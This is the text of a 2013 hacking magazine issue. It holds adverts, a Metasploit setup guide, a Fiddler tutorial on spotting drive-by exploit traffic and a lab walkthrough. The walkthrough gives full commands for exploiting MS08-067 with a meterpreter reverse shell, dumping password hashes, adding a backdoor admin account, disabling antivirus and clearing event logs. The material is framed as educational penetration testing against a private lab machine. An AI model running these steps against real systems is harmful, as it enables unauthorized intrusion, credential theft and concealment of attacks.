(01_2013) - beginners guide to hacking

TEL +44 (0)207 127 4501 FAX +44 (0)207 127 4503 EMAIL [email protected]

www.cybersecurityuae.com Conference & Exhibition

Assess the nature of the latest threats being faced and the impact of these upon your organisation

Discuss the most promising cyber security technologies in the marketplace

Assess the trends to watch in global cyber security

International Case Studies: Discover the best practice in protecting your organisation from cyber-attack

Network with your industry peers in the comfort of a 5 star venue

The only event of its kind to take place in the Middle East

Developments, Strategies and Best Practice in Global Cyber Security

CYBER SECURITY UAE SUMMIT 2013May 13th & 14th, Dubai

Special focus on the

Banking, Oil & Gas & Government

Sectors

Protecting critical infrastructuresMain Sectors Covered:

2nd Annual

CYBER SECURITY UAE TECH 2013

Hurry exhibition space for the 30

booth exhibition is expected to sell out.

For further details on exhibiting place email [email protected]

8 9 10 11 127

6

5

4

3

2

1

13

14

15

16

17

18

19

NE

TW

OR

KIN

G A

RE

A

NE

TW

OR

KIN

G A

RE

A

21 22

23 24

25 26

27 28

29 30

20

Electricity & Water

Oil & Gas

Financial Services

Transportation

Government

Defense

Make valuable connections at the networking

evening

GOLD SPONSOR

SILVER SPONSOR

MEDIA PARTNERS

The only

event of its kind

to take place

in the UAE

Featuring 30 top level speakers!TARIQ AL HAWI, Director, AE CERTBADER AL-MANTHARI, Executive Information Security, ITA OMAN OMAR ALSUHAIBANU, Network Security Engineer, CERT SAUDI ARABIA

AHMED BAIG, Head, Information Security and Compliance, UAE GOVERNMENT ENTITY

TAMER MOHAMED HASSAN, Information Security Specialist, UAE GOVERNMENT ENTITY

AMANI ALJASSMI, Head of Information Security Section, DUBAI MUNICIPALITY

NAVEED AHMED, Head of IT Security, DUBAI CUSTOMSRIEMER BROUWER, Head of IT Security, ADCOAYMAN AL-ISSA, Digital Oil Fields Cyber Security Advisor, ABU DHABI MARINE OPERATING COMPANY

MOSTA AL AMER, Information security Engineer, SAUDI ARAMCO.

HESHAM NOURI, IT Manager, KUWAIT OIL COMPANY

KENAN BEGOVIC, Head of Information Security, AL HILAL BANK

USAMA ABDELHAMID Director, UBSABEER KHEDR, Director of Information Security, NATIONAL BANK OF EGYPT

BIJU NAIR, Head of Audit, NOOR ISLAMIC BANK

BHARAT RAIGANGAR, Director, Corporate Security Advisor, ROYAL BANK OF SCOTLAND

ASHRAF SHOKRY, Chief Information Officer, AJMAN BANK

MOHAMED ROUSHDY, Chief Information Officer, NIZWA BANKZAFAR MIR Regional Manager Information Security Risk,

HSBC BANK MIDDLE EAST

MAHMOUD YASSIN Lead Security & System Eng Manager, NATIONAL BANK OF ABU DHABI

HUSSAIN ALKHASAN, IT GRC Manager, COMMERCIAL BANK OF DUBAI (UAE)

FURQAN AHMED HASHMI, (PMP, CISSP, CCIE, TOGAF) Architect, EMIRATES INVESTMENT AUTHORITY

STEVE HAILEY, President CEO, CYBER SECURITY INSTITUTE

OMER SYED, Project Manager, ROADS & TRANSPORT AUTHORITY

BIJU HAMEED, ICT Security Manager, DUBAI AIRPORTSMOHAMMED AL LAWATI, ICT policy and Procedure Advisor, OMAN AIRPORTS MANAGEMENT COMPANY

MURTAZA MERCHANT, Senior Security Analyst, EMIRATES AIRLINE

AMR GABER, Senior Network Security Engineer, DUBAI STATISTICS CENTRE

ANDREW JONES, Chairman of Information Security, KHALIFA UNIVERSITY

NASIR MEMO, Principal Investigator, NEW YORK UNIVERSITYPlus many more to be announced!

- NEW VMTRAINING COURSES -

Cloud Security, Audit and Compliance

Ultimate Bootcamp

VMware vSphere 5.0 Advanced

Administration & VCAP5-DCA Prep

Upcoming Class Dates:

Vancouver, BC 4/08/2013

London, England 4/15/2013

Rockville, MD 4/29/2013

Copenhagen, Denmark 5/13/2013

Ottawa, ON 5/27/2013

Des Moines, IA 6/03/2013

ONLINE 6/03/2013

San Diego, CA 6/24/2013

Rotenburg, Germany 6/24/2013

Veenendaal, Netherlands 7/01/2013

Call VMTraining Today! +1 (815) 313-4472 or visit www.VMTraining.net

CVSE (Certied Virtualization Security Expert) is a service mark of Global Training Solutions, Inc. and/or its aliates in the United States, Canada, and other countries, and may not be used without written permission. VMware is a registered trademark of VMware, Inc. in the United States and/or other countries. All other trademarks are the property of their respective owners. Global Training Solutions is not associated with any product or vendor in this advertisement and/or course.

Cloud Security, Audit and Compliance

Ultimate Bootcamp

VMware vSphere 5.0 Advanced

Administration & VCAP5-DCA Prep

ADVANCED VMWARE SECURITY

ADVANCED VMWARE SECURITY

SECURING THE CLOUD WITH VMWARE VSPHERE 5

Improved Design! Improved Availability!Improved Security!

STABLE VSPHERE ENVIRONMENT!

Attend the VMware Advanced Security with one of our experts!

01/2013 4

teamEditor in Chief: Krzysztof [email protected]

Editorial Advisory Board: John Webb, Marco Hermans, Gareth Watters, Peter Harmsen, Dhawal Desai

Proofreaders: Jeff Smith, Krzysztof Samborski

Special thanks to our Beta testers and Proofreaders who helped us with this issue. Our magazine would not exist without your assistance and expertise.

Senior Consultant/Publisher: Pawe Marciniak

CEO: Ewa Dudzic [email protected]

Product Manager: Krzysztof [email protected]

Production Director: Andrzej Kuca [email protected]

DTP: Ireneusz PogroszewskiArt Director: Ireneusz Pogroszewski [email protected]

Publisher: Hakin9 Media Sp. z o.o.Spka Komandytowa02-676 Warszawa, ul. Postpu 17dNIP: 9512353396 Regon: 145995275Phone: 1 917 338 3631www.hakin9.org/en

Whilst every effort has been made to ensure the highest quality of the magazine, the editors make no warranty, expressed or implied, concerning the results of the contents usage. All trademarks presented in the magazine were used for informative purposes only.

All rights to trade marks presented in the magazine are reserved by the companies which own them.

DISCLAIMER!The techniques described in our articles may only be used in private, local networks. The editors hold no responsibility for misuse of the presented techniques or consequent data loss.

Dear Readers,

I am happy to present you with this very first issue of our new project Hakin9 Starter Kit. This issue will address various topics connected with IT Security. Although the line is mainly devoted to those of you who would like to start they journey with hacking, we strongly believe that each and every reader of ours will find something interesting here. For these, the issue can be regarded as a perfect repetition of the knowledge you already have.

Despite the fact that this issue addresses various topics, the following ones will stress particular topics like tools, methods, technologies or devices. With this first issue we wanted to shed some light on the structure and content of the whole project.

This time you will find sections as: Exploiting Software, Fo-rensics, Hacking, Cloud and Security.

In case you were interested in writing a basic article for our forthcoming editions, please feel free to contact us at [email protected].

We are really interested in your opinions on our new line too. Please send them to the aforementioned mailing address.

Hope you enjoy the magazine!

Reagrds,Krzysztof Samborski

Hakin9 Product Managerand Hakin9 Team

www.hakin9.org/en 5

CONTENTS

EXPLOITING SOFTWAREA Quick Reference To Metasploit Framework 06By Abhinav Singh, the author of Metasploit penetration testing cookbook, a contributor of SecurityXploded community

My First Hack, Basic Introduction To Metasploit Framework 10By Guglielmo Scaiola, I.T. Pro since 1987, MCT, MCSA, MCSE, Security +, Lead Auditor ISO 27001, ITIL, eCPPT, CEI, CHFI, CEH and ECSA

How To Capture Web Exploits With Fiddler 18By Jerome Segura, A Senior Malware Research at Malwarebytes

How To Reverse Engineer .NET files 24By Jaromir Horejsi, A computer virus researcher and analyst

FORENSICSAn Introduction To Microsoft Windows Forensics 28By Akshay Bharganwwar, a representative of Indian Cyber Army, Hans-Anti Hacking Society & Internatinal Cyber Threat Task Force

Digital Forensics On The Apple OSX Platform 32By David Lister, CISSP, CASP, CCISO, CCNA, CEH, ECSA, CPT, RHCSA, Security+

HACKINGA Beginners Guide To Ethical Hacking 38By Deepanshu Khanna, Linux Security Researcher and Penetration Tester at Prediqnous Cyber Security & IT Intelligence

Hack Again, From Servers to Clients 46By Guglielmo Scaiola, I.T. Pro since 1987, MCT, MCSA, MCSE, Security +, Lead Auditor ISO 27001, ITIL, eCPPT, CEI, CHFI, CEH and ECSA

How To Perform SQL Injection And Bypass Login Forms Like A Pro 52By James Tan, ISO 27001, CISSP, CCSK, CISA, eCPPT, PMP

How To Become A Penetration Tester 60By Preston Thornburg, A Senior Penetration Tester, worked for Rapid7, Knowledge Consulting Group, International Business Machines, Mantech International, and Sun Microsystems

Passwords Cracking: Theory And Practice 66By Theodosis Mourouzis, A PhD student at University College London and Marios Andreou, MSc in Information Security from Royal Holloway (The University of Londons Information Security Group)

Fedora Security Spin An All-in-one Security Toolbox 72By Abdy Martnez, Telecommunications Administrator at AES Panama, specialized in Network / Information Security and Forensics

CLOUD Intrusion Detection System (IDS): An Approach To Protecting Cloud Services 76By Fahad F. Alruwaili, An Information Security Consultant, PhD Student, Research Assistant, and Full Time Lecturer at Shaqra University

Understanding Cloud Security Issues 80By Moshe Ferber, One of Israel's leading information security experts

SECURITYHow To Store Data Securely On Android Platform 86By Stefano fi Franciska, Software analyst/developer

How To Secure Web Applications 92By Vahid Shokouhi, An Information Security Consultant experienced in Service Provider environments

CouchDB Database For Web And Mobile Platforms 100By Zana Ilhan, A Senior Software Architect and Cloud Team Leader at a hi-tech R&D company

How To Get Maximum Security Of Your Information 106By Ahmed Fawzy, CEH-ECSA-ITIL-MCP-MCPD-MCSD-MCTS-MCT

01/2013 6

Metasploit framework: It is a free, open source penetration testing framework started by H.D. Moore in 2003 which was later acquired by Rapid7. The current stable ver-sions of the framework are written using Ruby language. It has the worlds largest database of tested exploits and receives more than a million downloads every year. It is also one of the most complex projects built in Ruby till date.

Vulnerability: It is a weakness which allows an at-tacker/Pen-tester to break into/compromise a sys-tems security. The weakness can either exist in the operating system, application software or even in the network protocols.

Exploit: Exploit is a code which allows an attack-er/tester to take advantage of the vulnerable sys-tem and compromise its security. Every vulnerabil-ity has its own corresponding exploit. Metasploit v4 has more than 700 exploits.

Payload: It is the actual code which does the stuff. It runs on the system after exploitation. They are mostly used to setup a connection between the attacking and the victim machine. Metasploit v4 has more than 250 payloads.

Module: Modules are the small building blocks of a complete system. Every module performs a specific task and a complete system is built up by combining several modules to function as a single unit. The biggest advantage of such architecture

is that it becomes easy for developers to integrate new exploit code and tools into the framework.

The metasploit framework has a modular archi-tecture and all the exploits, payload, encoders etc are considered as separate modules (Figure 1).

Let us examine the architecture diagram closely. Metasploit uses different libraries which hold the

key to proper functioning of the framework. These libraries are a collection of pre-defines tasks, opera-tions and functions that can be utilized by different modules of the framework. The most fundamental part of the framework in the Rex library which is a short form for Ruby Extension Library. Some of the components provided by Rex include a wrapper socket subsystem, implementations of protocol cli-ents and servers, a logging subsystem, exploitation utility classes, and a number of other useful class-es. Rex itself is designed to have no dependencies other than what comes with the default Ruby install.

Then we have the MSF Core library which ex-tends Rex. Core is responsible for implementing all of the required interfaces that allow for interacting with exploit modules, sessions, and plugins. This core library is extended by the framework base li-brary which is designed to provide simpler wrapper routines for dealing with the framework core as well as providing utility classes for dealing with differ-ent aspects of the framework, such as serializing module state to different output formats. Finally, the

Quick Reference To Metasploit FrameworkMetasploit is currently the most widely used and recommended penetration testing framework. The reason which makes metasploit so popular is the wide range of tasks that it can perform to ease the work of penetration testing. Let us start with a quick introduction to the framework and various terminologies related to it.

A Quick Reference To Metasploit Framework

base library is extended by the framework UI (user interface) which implements support for the different types of user interfaces to the framework itself, such as the command console and the web interface.

There are four different user interfaces provided with the framework namely msfconsole, msfcli, msf-GUI and msfWeb. It is highly encouraged that one should checkout all these different.

Configuring Metasploit on WindowsInstallation of metasploit framework on win-dows is simple and requires almost no effort. The framework installer can be downloaded from the metasploit official website http://www.meta sploit.com/download.

You will notice that there are two type of in-staller available for windows. We recommend downloading the complete installer of metasploit framework which contains the console and all other relevant dependencies along with the da-tabase and runtime setup. In case you already have a configured database that you want to use for the framework as well, then you can go for the mini installer of the framework which only installs the console and dependencies.

You will find that the installer has created lots of shortcuts for you. Most of the things are click-and go in windows environment. Some of the options that you will find are metasploit web, cmd console, metasploit update etc.

Configuring Metasploit on UbuntuMetasploit framework has full support for Ubuntu based Linux operating systems. The installation process is a bit different from that of Windows.

The process for installing a full setup is a bit differ-ent from minimal setup. Let us analyse each of them.

Full installer: You will need to execute the fol-lowing commands to install the framework on your Ubuntu machine:

$ chmod +x framework-4.*-linux-full.run$ sudo ./framework-4.*-linux-full.run

Minimal installer: You will need to execute the fol-lowing commands to install the framework with minimal options:

$ chmod +x framework-4.*-linux-mini.run$ sudo ./framework-4.*-linux-mini.run

The installation process demonstrated above is a simple Ubuntu based installation procedure for almost all software. Once the installation is com-plete, you can run hash r to reload your path.

Now lets talk about some other options, or possi-bly some pieces of general information that are rel-evant to this task. There can be chances that the installer may not work for you due to some reason. Some versions of Ubuntu come with broken librar-ies of Ruby language, which may be one of the rea-

a d v e r t i s e m e n t

01/2013 8

sons for the installation failure. In that case, we can install the dependencies separately by executing the following commands: Installing Ruby dependencies:

$ sudo apt-get install ruby libopenssl-ruby libyaml-ruby libdl-ruby libiconv-ruby libreadline-

ruby irb ri rubygems

Installing the subversion client:

$ sudo apt-get install subversion

Building Native Extensions:

$ sudo apt-get install build-essential ruby-dev libpcap-dev

After installing the following dependencies, down-load metasploit Unix tarball from the official metasploit download page and execute the follow-ing commands

$ tar xf framework-4.X.tar.gz$ sudo mkdir -p /opt/metasploit4$ sudo cp -a msf4/ /opt/metasploit3/msf4$ sudo chown root:root -R /opt/metasploit4/msf4$ sudo ln -sf /opt/metasploit3/msf3/msf* /usr/

local/bin/

On successful execution of the above commands, the framework will be up and running to receive your instructions.

This was a quick tutorial on getting started with the Metasploit framework and how it can be set to work in different environments. It is highly recom-mended that the reader should practically imple-ment the complete framework and get their hands on experience on working over it. Not to forget that the Metasploit framework is an open source plat-form hence you always have the power to custom-ize it according to your needs.

AbhinAv SinghAbhinav Singh is a young information security specialist from India. He has a keen interest in the field of Hacking and Network security and has adopted this field as his full time employment. He is the author of Metasploit penetration

testing cookbook, a book dealing with Metasploit and penetration testing. He is also a contributor of Securi-tyXploded community. Abhinavs work has been quoted in several portals and technology magazines. He can be reached at: Mail: [email protected]. Twitter: @abhinavbom.

Figure 1. Metasploit Architecture

Certified ISO27005 Risk ManagerLearn the Best Practices in Information Security Risk Management with ISO 27005 and become Certified ISO 27005 Risk Manager with this 3-day training!

CompTIA Cloud Essentials ProfessionalThis 2-day Cloud Computing in-company training will qualify you for the vendor-neutral international CompTIA Cloud Essentials Professional (CEP) certificate.

Cloud Security (CCSK)2-day training preparing you for the Certificate of Cloud Security Knowledge (CCSK), the industrys first vendor-inde-pendent cloud security certification from the Cloud Security Alliance (CSA).

e-SecurityLearn in 9 lessons how to create and implement a best-practice e-security policy!

IT Security Courses and Trainings

IMF Academy is specialised in providing business information by means of distance learning courses and trainings. Below you find an overview of our IT security

courses and trainings.

IMF Academy [email protected] Tel: +31 (0)40 246 02 20 Fax: +31 (0)40 246 00 17

For more information or to request the brochure please visit our website: http://www.imfacademy.com/partner/hakin9

Information Security ManagementImprove every aspect of your information security!

SABSA FoundationThe 5-day SABSA Foundation training provides a thorough coverage of the knowlegde required for the SABSA Foundation level certificate.

SABSA AdvancedThe SABSA Advanced trainings will qualify you for the SABSA Practitioner certificate in Risk Assurance & Govern-ance, Service Excellence and/or Architec-tural Design. You will be awarded with the title SABSA Chartered Practitioner (SCP).

TOGAF 9 and ArchiMate FoundationAfter completing this absolutely unique distance learning course and passing the necessary exams, you will receive the TOGAF 9 Foundation (Level 1) and ArchiMate Foundation certificate.

01/2013 10

F or this lab I use an old Windows XP Sp3 italian and my favorite attacking machine with Backtrack 5R3 x64, the Ip address of the target is 192.168.254.11/24 and my IP is 192.168.254.3/24.

This article is for beginner for this reason only to word to set attacker IP address, BT 5 R3 has a dhcp client deamon dhclient3 started by default, but I can set my IP statically with three simple commands:

Ifconfig eth0 192.1689.254.3/24 for setting IP

and subnetroute add default gw 192.168.254.254 for setting

default gateway

echo nameserver 8.8.8.8 > /etc/resolv.conf for

setting the DNS server, now I will use google DNS server

You can stop the dhco client service with kil-lall dhclient3 without this command you can loose your IP when the dhclient timeot end and the dae-mon start with a new dhcpdiscover.

If you prefer dhcp, you can force the process with the command dhclient3 (Figure 2).

For a more realistic environment I have installed in the target machine Avast free antivirus ed.2012 with the last signature database (Figure 3).

Figure 1. Static IP

Figure 2. Start dhcp clientFigure 3. My Target machine AV

My First hack, basic introduction to Metasploit Framework

Hey Guys, are you ready for 0wning our first machine?Yes, today we go together in the word of ethical hacking, we try to exploit our first machine, but not like a script kiddies, but with the five step of professional pentest yes the machine has onboard an old operating system, yes the exploit is also old, but I hope you understand all our step and, with patience and study, you can exploit in the same manner newer machine.

www.hakin9.org/en 11


Normally I use Vmware Workstation for my labs, today I am using the version 9.0.1, no matter for network setup, now I work in bridged mode, but you can use your preferred configuration, the only issue is to set all virtual machine in the same manner.

Now I will work in professional way, like ethical hackers and not a black hat, for do this I need to respect ROE (role of engagement) for ensure SLA (service level agreement), but this is not enough, to ensure metrics and repeatability we need to use a well known methodology, is out of scope of this ar-ticle explain in detail complex methodology like OS-TMM, but the more simple methodology is the use of five step; two step of pre-attack phase, the attack phase and other two step of post-attack phase.

Here we go with the first step, the scanning

Step 1 ScanningFor this purpose I use nmap, in my opinion nmap is the better choice for network scanning, you can scan the network in many way, but if your ROE in-clude low noise you cant use the scanner with all default settings, like:

nmap 192.168.254.11 (just only for timing, I work with the single IP and not with the entire subnet)

If I use all nmap defaults I will scan 1000 port (http://nmap.org/book/man-port-specification.html) with T3 timing, with T3 nmap include parallelization of scanned ports (T0 wait 5 min. between sending each probe, T1 wait 15 sec. and T2 wait 04 sec. http://nmap.org/book/man-performance.html), for a more stealth scan I choose only few port, in my example the ports 80,139,445,21 and 3389 and I

set the timing manually, in real life I will choose T0, but in this example, and only for not wasting time, I use T3. With the switch sV I tell nmap to scan ser-vices versions.

nmap 192.168.254.11 -p 80,139,445,21,3389 -sV -O -T3

The first interesting information is the ports 139 and 445 are open, and nmap try also to discover the Operating System version

OS CPE: cpe:/o:microsoft:windows_xp::sp3

OS details: Microsoft Windows XP SP3

Mmmmh, if you are an experienced pentester the couple winXp and port 139(or 445) Tcp open sug-gests an SMB vulnerabilityok, go deeper using nmap scripts

Step 2 EnumerationWe have a lot of tools and techniques for enu-meration, if you are very aggressive, you can use Nessus or OpenVas or other vulnerability assessment tools, for this demo I will use some NSE scripts, NSE is Nmap Scripting Engine, this kind of scripts can hel you in a lot of situation, if you want to know more about nse scripts you can

Figure 7. Run nmap scripts

Figure 6. smb-os-discovery script

Figure 5. smb-check-vulns script

Figure 4. Scanning with nmap

01/2013 12

read the documentation at: http://nmap.org/nsed-oc/. In our example I use only two scripts, this is a good tecnique for keep down the noise, if you dont have this problem you can use all scripts or a scripts family, you can also use some scripts. The default family using the nmaps switchs: A, this switch execute sV, version scan, O detec-tion of operating system, traceroute and the de-fault family of NSE scripts, the scripts that make the various families can be founded in nsedoc web page. For scanning my target I use smb-check-vulns script for check if the target is vul-nerable for some well-known attacks, the second script is smb-os-discovery, this script is good for detecting the OS version via SMB discovery. The first script can be dangerous, for this, nmap dont use directly, for the right execution you must use the switch --script-args=unsafe=1 (Figure 5 and Figure 6).

My string become:

nmap 192.168.254.11 -p 139 --script=smb-os-discovery,smb-check-vulns --script-args=unsafe=1

After the scripts execution I can see witch the tar-get machine are vulnerable to MS08-067 SMB re-mote buffer overflow, now I try to gain access in to the target machine.

Step 3 gaining accessIf you are a n00b is possible who you dont know what is MS08-067 this is a GREAT exploit, just a little bit older, but great, you can use this exploit a lot of times even if you are using it against a ma-chine already compromised, if the exploit crash, no problem you can re-use again, the next SMB exploit, the SMB exploit MS09-050 is also a good exploit, but some time you can get BSOD, if your session crash you arent able to compromise again the target unless the machine was rebooted no, the MS08-067 is not like this you can use it as many times as you want in any way you want ... of course if the service is started: D.

But if you dont know this exploit google is your friend if I put my question in google: "metasploit ms08 067 netapi" you can get the page in metasploit.com site (Figure 8-10)

As you can see, this exploit work with a lot of operating system from windows 2000 universal to windows XP sp3, the exploit has also the default option automatic targetinggreat

Now I can start metaploit in my attacking ma-chine, in my installation metasploit is in /git/metasploit/metasploit-framework if your path is dif-ferent you need to modify the change directory op-erationIn my machine:

Figure 8. Search exploit with google http://www.metasploit.com/modules/exploit/windows/smb/ms08_067_netapi

Figure 9. Exploit description in metasploit.com Figure 10. Target OS for my exploit



cd /git/metasploit/metasploit-framework

Is also possible witch your metasploit path was in executables path, in this case you need only to call metasploit console

OK, now I am in the correct directory and I can start msfconsole, my preferred metasploit interface:

./msfconsole ( if you are invoking metasploit con-sole from another directory because the binary is in the executable search path you must type only msfconsole without the ./; Figure 11).

Now, if I dont know where the exploit is, I can search with the command:

search ms08-067

I type use exploit/windows/smb/ms08 _ 067 _ netapi for set my exploit and with the command info I can have, more or less, the same output of the web page of the Figures 13 and 14.

I need to set my payload and other required op-tions, if I can I use meterpreter, and the revers pay-loads are very usefull , you can also choose pay-load like reverse_http that comply with protocol requirement https://community.rapid7.com/com-munity/metasploit/blog/2011/06/29/meterpreter-httphttps-communication:

Figure 16. Gotcha

Figure 15. Setting exploit

Figure 14. Exploit info cont

Figure 13. Exploit info

Figure 12. Searching exploit in metasploit

Figure 11. Starting msfconsole

01/2013 14

set PAYLOAD windows/meterpreter/reverse_tcp

set RHOST 192.168.254.11set LHOST 192.168.254.3

RHost is the target machine, lhost is the machine where I want to go the reverse shell.

With show options I can verify my settings and with exploit I can run my exploit.

In real word I use exploit j because with this op-tion you can force the active module to the back-ground (Figure 15 and 16).

In Figure 16, you can see the creation of your first meterpreter session very well, you are a hacker now

.mmmmhh it is not so simple you have still a long way but this is your first 0wning this is the beginning now you can interact with your session using the command:

sessions i 1

With getuid you can show your current user and with getpid you can see your process id, the com-mand ps is for showing the processes, at this point you can migrate from your current process to an-

Figure 17. Start interaction

Figure 18. Target processes

Figure 19. Migrate to another process

Figure 20. Password hashes Figure 24. Uninstall metsvc

Figure 23. Ok, try again

Figure 22. Avast wins

Figure 21. Oops



otherin this case I want to migrate to explorer process, this is a good process, normally the users dont kill explorer until the machine turn off.

For migrating from process to another I use mi-grate command with the PID number (Figure 18)

In my example explorer has PID 1084 and I type:

migrate 1084

If I need system privilege I can try privilege esca-lation with getsystem command.

Step 4 Maintaining accessFor future use I can get the passwords hashes with the script hashdump:

run hashdump

The AV installed in my target machine dont show alerts because meterpreter work only in memory, but the problem to stay in memory is. if the us-er reboot machine I lose my session and if the user load a Microsoft patch for this vulnerability

Figure 28. Go to RDP

Figure 27. Avast 2 Persistence 0

Figure 26. Trying another way

Figure 25. Avast processes

Figure 29. Connecting with rdesktop

Figure 30. Log me in

Figure 31. Disabling AV

Figure 32. Meterpreter service

01/2013 16

I lose my session forever meterpreter has two way to maintain access, but for do this is neces-sary to put something to hard disk and now the AV winstry

run metsvc (metsvc has some options, but in this case is not important).

As you can see in Figure 21 meterpreter cant cre-ate the service and if you go to target console you can see the AV popupnot good (Figure 22).

Is not my business, but a lot of time ago my friend tell me the existence of killav scriptI dont know but the name look goodlets try run killav and now try again with metsvc (Figure 23)

Fail again if you type run metsvc with h you get the help and with run metsvc r you can uninstall the service with the AV is possible which a part of service get installed, is better to remove before continue with our experiments (Figure 24)

With ps command you can show the AV process-es in my case the AV is Avast and the processes is AvastSvc and AvastUi, but you cant stop this processes, today most AV protect their services from the stop, in a lot of product you cant modify the reg keys for this services (Figure 25) Okbypassing AV is too hard for meI will try the sec-ond way (Figure 26):

run persistence

But the AV wins again no way (Figure 27).Ok, forget the persistence for few moments

now I want to get RDP access, for do this I need to create new admin user:

load incognito with this extension I work with

users and groupsAdd_user hacker Passw0rd I add a new user hacker

with password Passw0rd

Add_localgroup_add administrators hacker and

I put my new create user in the administrators group

Figure 33. Listening ports

Figure 34. Deleting user

Figure 37. The target log verbosely

Figure 36. Uninstalling metsvc

Figure 35. Disabling RDP



Now I will enable the RDp on target machine, I have a usefull script for this (Figure 28):

run getgui -e

I log on my target with rdesktop:

rdesktop 192.168.254.11 k it (I use Italian keyboard)

And now I am logged on (Figure 30) Now I will disable the AV, I will try the most trivial solu-tion from Windows XP GUI push right over AV icon and then disable for few minutes (Figure 31),

Figure 38. But now dont log me

Figure 39. The log look better now

Figure 40. Yes, now look good

if you re-tray now with run metsvc the service will install. And the default metsvc port 31337 Tcp is listening (Figure 32 and Figure 33).

If you scan the HD with your AV the meterpret-er file was discovered and the name of services is too detectablebut this is a beginners articlestay tuned;)

Step 5 Clearing tracksMy first step for clearing track is to remove all which I have installed for disabling AV, from the GUI I open compmgmt.msc and I delete my user hacker (Figure 34).

After that I open remote connection and I re-move the flag for enabling RDP (Figure 35).

Now I lose the connection with the system, from my meterpreter console I remove metsvc services with run metsvc -r (Figure 36).

Before closing my session still lack one thing, the log just for your information this is the log of my target machine (Figure 37).

Mmmhhh, too much information.from meter-preter session I type clearev and all log will cleared (Figure 38).

If you look the log now you can see only Security Event ID 517 the audit log was cleared NT AU-THORITY/SYSTEM (Figure 39) and the other log contain nothing and now you can go drink a nice cold beer young hacker but this is only the beginning... the second step is try to get ses-sion via client side attack (Figure 40)

gUgliElMo SCAiolAI work as I.T. Pro since 1987, I am a freelance consultant, pentester and trainer, I work especially in banking environment. Over the years I have achieved several certifications, in-cluding: MCT, MCSA, MCSE, Security +,

Lead Auditor ISO 27001, ITIL, eCPPT, CEI, CHFI, CEH and ECSA. In 2011 I was awarded the Ec-Council Instructor Circle of Excellence.I can be contacted at [email protected].

01/2013 18

Fiddler acts as a proxy between client appli-cations (such as a web browser) and the websites they are connecting too (Figure 1).All HTTP(S) requests and responses transit

through the Proxy, giving you the ability to see ex-actly what is going on between your browser and the servers it is connecting to.

Analyzing web trafficEvery time you navigate to a website, your brows-er sends out a Request for a particular URL. The web server will reply with a Response containing the page you asked for (or a not found 404 error if that document did not exist). This Request-Re-sponse workflow is known as a Web Session in Fiddler. Each Session is represented by a row in the Web Sessions List: Figure 2.

Fiddler uses standard columns (you can add more or customize your own) that display certain properties for each Web Session:

#: A number that sorts each Session by chron-ological order

Result: The HTTP response code indicating whether the server was able to fulfill the re-quest or not.

Protocol: Fiddler only works for HTTP(S) and FTP protocols.

Host: The websites domain name. URL: The full path of the URL requested. Body: The size of the response Caching: Caching, as supported by client appli-

cations. Content-Type: As described, the type of con-

tent returned (html, JavaScript, image)

how To Capture Web Exploits With FiddlerDrive-by attacks are the most common infection vector and have been so for several years. The Exploit Kit market is also thriving and the kits getting more sophisticated and pricier. Whether you suspect your own site has been infected or you are a security researcher tracking down malicious URLs, Fiddler is a very capable and useful tool to help you identify traffic patterns, malicious code and exploit URLs.

Figure 1. Fiddlers proxy between client application and web server

Figure 2. Fiddlers main view showing the Web Sessions list


how To Capture Web Exploits With Fiddler

Process: The client application making the re-quest (i.e. Internet Explorer, Firefox, Adobe Reader, etc)

Most people only use Fiddler to view web traf-fic or find which URLs are being requested and its simple interface does the job quite well. But theres a whole new world beyond that if you are interested in learning more about the code that goes through your browser.

By default, Fiddlers Tab section is on the right hand side and gives you more information on each Web Session. We will focus on the Inspectors tab as it is the most relevant to our needs. When you highlight a particular Web Session, the Inspectors tab is divided into the Request at the top and the Response at the bottom.

The Request view (Figure 3) gives you informa-tion about the client (through its User-Agent), its Request type (GET, POST, etc) as well as oth-er parameters such as compression (Encoding), cookies, etc (Figure 4).

The web servers Response (Figure 5) which in-cludes the type, length of the responses body as

well as some information revealed by the servers configuration files (Operating System, server soft-ware, etc.)

You will note there are other sub-tabs for both the Request and Response. The Raw tab is your go-to shortcut to rapidly view the contents body. The information is rendered in plain text format.

Based on the content type, the raw view may not be best suited. If you are dealing with an im-age you may want to check the ImageView tab, if you have an executable you may want to open the HexView tab. Since often times we want to review the source code of a webpage, I recommend the SyntaxView which nicely formats html, JavaScript or CSS code (Figure 6).

To enable some of these views and more, you can check out Fiddlers extensions page.

Spotting malicious codeNow that you know the basic principles, lets dig in deeper and look at how Fiddler can help you to identify malicious code. But first lets find out what you should expect to be looking for. A typical drive-

Figure 7. Source code view showing a malicious external link

Figure 6. SyntaxView and its friendly formatting

Figure 5. The Responses Raw window

Figure 4. The Response Headers window

Figure 3. The Request headers window

01/2013 20

by download attack has some aspects that may vary slightly from one attack to another but gener-ally speaking, they still use a similar pattern.

infected legitimate website URlIn the majority of cases, it all stems from a typi-cal website that has been infected with malicious code. The purpose of that code is to redirect the visitor to an external and malevolent website. The Responses body viewed using the SyntaxView shows such an example (I manually circled in red the malicious link): Figure 7.

RedirectsAs a way to evade simple detection and be more dynamic, the bad guys will often redirect traffic several times before taking the victim to an exploit site (Figure 8 and Figure 9).

Exploit Kit landing page URlThis is where the exploits begin. In many cases, the victims system (Operating System, browser type and version, plugins etc.) will be identified pri-or to delivering the malicious code. To make detec-tion harder, such code is usually well obfuscated.

Not all obfuscated code is malicious (some web-sites want to protect their Intellectual Property and actually encrypt their code from prying eyes for good reasons) (Figure 10).

Exploit Kit malicious files (JARs, PDFs, SWF, etc)Besides exploiting the browser itself, most exploits target third party browser plugins in software like Java or Adobe. As such, exploit kits will download infected documents which as soon as they are open will exploit one of many vulnerabilities and allow for undesired code execution.

The image below shows a Java, PDF and Flash exploit (Figure 11).

The Flash exploit isnt obvious until you take a look at the Request headers which tells you what version of Flash is installed and going to be ex-ploited (Figure 12).

Figure 12. The browser telling the server which version of Flash is installed

Figure 10. A landing page with obfuscated code

Figure 9. Multiple domains being used before reaching an exploit landing page

Figure 8. A typical http-equiv=refresh that redirects the user

Figure 11. An Exploit Kits URLs pointing at infected documents

Figure 13. The MZ Magic Number representing an executable


how To Capture Web Exploits With Fiddler

Exploit Kit malware payloadThe main reason all these efforts have been put into place is for a malicious binary to be download-ed and infect the victims PC. The HexView tab will show you the file in hexadecimal code: Figure 13.

Archiving files for later or to exchange with othersAnother feature that few people know is that Fid-dler stores all of the files in its Web Sessions list. In other words, you can save them to disk directly from Fiddler: Select a session, right-click and choose Save>Response>Response Body (Figure 14).

As with other tools, your traffic capture can be exported to various formats: Figure 15.

